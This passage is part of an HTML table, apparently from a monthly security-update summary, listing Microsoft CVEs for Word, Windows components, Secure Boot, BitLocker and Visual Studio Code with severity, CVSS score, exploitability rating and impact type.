  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45457"><span>CVE-2026-45457</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42980"><span>CVE-2026-42980</span></a></td>
  <td width="256" class="xl68">NT OS Kernel Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42916"><span>CVE-2026-42916</span></a></td>
  <td width="256" class="xl68">NT OS Kernel Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45649"><span>CVE-2026-45649</span></a></td>
  <td width="256" class="xl68">Office for Android
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47653"><span>CVE-2026-47653</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42909"><span>CVE-2026-42909</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42913"><span>CVE-2026-42913</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42993"><span>CVE-2026-42993</span></a></td>
  <td width="256" class="xl68">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45588"><span>CVE-2026-45588</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48568"><span>CVE-2026-48568</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48570"><span>CVE-2026-48570</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48573"><span>CVE-2026-48573</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48575"><span>CVE-2026-48575</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48576"><span>CVE-2026-48576</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48578"><span>CVE-2026-48578</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45654"><span>CVE-2026-45654</span></a></td>
  <td width="256" class="xl68">Secure Boot Security
  Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45656"><span>CVE-2026-45656</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-8863"><span>CVE-2026-8863</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40376"><span>CVE-2026-40376</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47281"><span>CVE-2026-47281</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47284"><span>CVE-2026-47284</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47292"><span>CVE-2026-47292</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  MSSQL Extension Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48569"><span>CVE-2026-48569</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47287"><span>CVE-2026-47287</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42829"><span>CVE-2026-42829</span></a></td>
  <td width="256" class="xl68">Windows Administrator
  Protection Secure Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34335"><span>CVE-2026-34335</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45601"><span>CVE-2026-45601</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45598"><span>CVE-2026-45598</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45596"><span>CVE-2026-45596</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45638"><span>CVE-2026-45638</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45603"><span>CVE-2026-45603</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42911"><span>CVE-2026-42911</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45594"><span>CVE-2026-45594</span></a></td>
  <td width="256" class="xl68">Windows Application
  Identity (AppID) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45655"><span>CVE-2026-45655</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45658"><span>CVE-2026-45658</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45640"><span>CVE-2026-45640</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth Port
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45605"><span>CVE-2026-45605</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47656"><span>CVE-2026-47656</span></a></td>
  <td width="256" class="xl68">Windows Boot Manager
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44809"><span>CVE-2026-44809</span></a></td>
  <td width="256" class="xl68">Windows Common Log
  File System Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45634"><span>CVE-2026-45634</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45608"><span>CVE-2026-45608</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41108"><span>CVE-2026-41108</span></a></td>
  <td width="256" class="xl68">Windows DNS Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42905"><span>CVE-2026-42905</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44811"><span>CVE-2026-44811</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44808"><span>CVE-2026-44808</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44807"><span>CVE-2026-44807</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42983"><span>CVE-2026-42983</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44802"><span>CVE-2026-44802</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44813"><span>CVE-2026-44813</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44804"><span>CVE-2026-44804</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48566"><span>CVE-2026-48566</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44814"><span>CVE-2026-44814</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45602"><span>CVE-2026-45602</span></a></td>
  <td width="256" class="xl68">Windows Dynamic Host
  Configuration Protocol (DHCP) Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42836"><span>CVE-2026-42836</span></a></td>
  <td width="256" class="xl68">Windows Function
  Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42910"><span>CVE-2026-42910</span></a></td>
  <td width="256" class="xl68">Windows Hotpatch
  Monitoring Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42972"><span>CVE-2026-42972</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45592"><span>CVE-2026-45592</span></a></td>
  <td width="256" class="xl68">Windows Internet
  (wininet.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42903"><span>CVE-2026-42903</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42914"><span>CVE-2026-42914</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48583"><span>CVE-2026-48583</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45653"><span>CVE-2026-45653</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42984"><span>CVE-2026-42984</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45600"><span>CVE-2026-45600</span></a></td>
  <td width="256" class="xl68">Windows Kernel-Mode
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45604"><span>CVE-2026-45604</span></a></td>
  <td width="256" class="xl68">Windows Managed
  Installer Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45595"><span>CVE-2026-45595</span></a></td>
  <td width="256" class="xl68">Windows Mark of the
  Web Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45636"><span>CVE-2026-45636</span></a></td>
  <td width="256" class="xl68">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50508"><span>CVE-2026-50508</span></a></td>
  <td width="256" class="xl68">Windows NTLM Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48565"><span>CVE-2026-48565</span></a></td>
  <td width="256" class="xl68">Windows Narrator
  Braille Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
